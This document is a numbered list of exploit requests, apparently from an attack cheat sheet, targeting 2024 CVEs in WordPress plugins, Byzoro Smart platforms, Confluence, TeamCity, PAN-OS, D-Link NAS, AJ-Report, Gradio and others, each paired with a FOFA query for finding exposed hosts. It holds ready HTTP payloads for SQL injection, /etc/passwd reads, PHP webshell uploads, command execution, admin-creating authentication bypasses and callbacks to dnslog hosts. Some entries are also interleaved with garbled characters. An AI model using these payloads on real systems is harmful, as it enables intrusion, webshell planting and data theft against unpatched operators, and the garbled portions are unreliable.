113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (Byzoro) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Access /home/src.php

119. Beijing Baichuo (Byzoro) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (Byzoro) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. Byzoro Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Byzoro Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

% r) @" \% @3 q' s2 x8 Y) ^147. RaidenMAILD邮件服务器v.4.9.4-路径遍历* M. x0 ~7 _# o" z
CVE-2024-32399/ `2 X! _% T3 |
FOFA:body="RaidenMAILD"
, Y, K' a" ?4 o$ p$ NGET /webeditor/../../../windows/win.ini HTTP/1.1
; W/ b4 `5 E( T1 z: Y5 m% mHost: 127.0.0.1:818 f3 ]$ J5 d. Z: k' o# s
Cache-Control: max-age=0
( Q* `( F! z5 aConnection: close+ Z; X& G4 g( P8 i

& V+ V: y1 ^& V% b8 d+ s1 z7 c, A) c, p3 ?7 V" T. M3 S
148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

+ n# ^4 T' d+ |5 b( w; i152. Progress Kemp LoadMaster 远程命令执行
/ d( O' D; }3 yCVE-2024-1212- f. ]9 [3 \) ~
LoadMaster <= 7.2.59.2 (GA)( `( N0 J$ y+ ]7 y# V
LoadMaster<=7.2.54.8 (LTSF)
% G, c! B$ s1 Q& wLoadMaster <= 7.2.48.10 (LTS)
  r% y. b, D$ Z# d% oFOFA:body="LoadMaster"
9 T# \+ D$ N/ _! e' \JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
8 `9 V) t2 o! r$ @5 o/ PGET /access/set?param=enableapi&value=1 HTTP/1.1
' F' ^3 T) @, V$ K6 _* ZHost: x.x.x.x. }  s5 H& z9 }- o) o* o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
8 i* ~5 M2 R" W" `0 L+ x5 l3 H8 u) MConnection: close5 v6 @; o! e% f- \
Accept: */*! ?2 ^; Q/ c: V6 y' f  ?+ F
Accept-Language: en( [1 w6 f! z7 @' v
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
% j* C7 P0 A5 N, G/ \# v. k& @% kAccept-Encoding: gzip, ^: I4 Q& D0 _8 ^, a

+ R' g1 q  |# s/ h4 g: Y4 \& i9 |2 ?1 u9 b  W2 J$ C
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司"  && title=="登入"
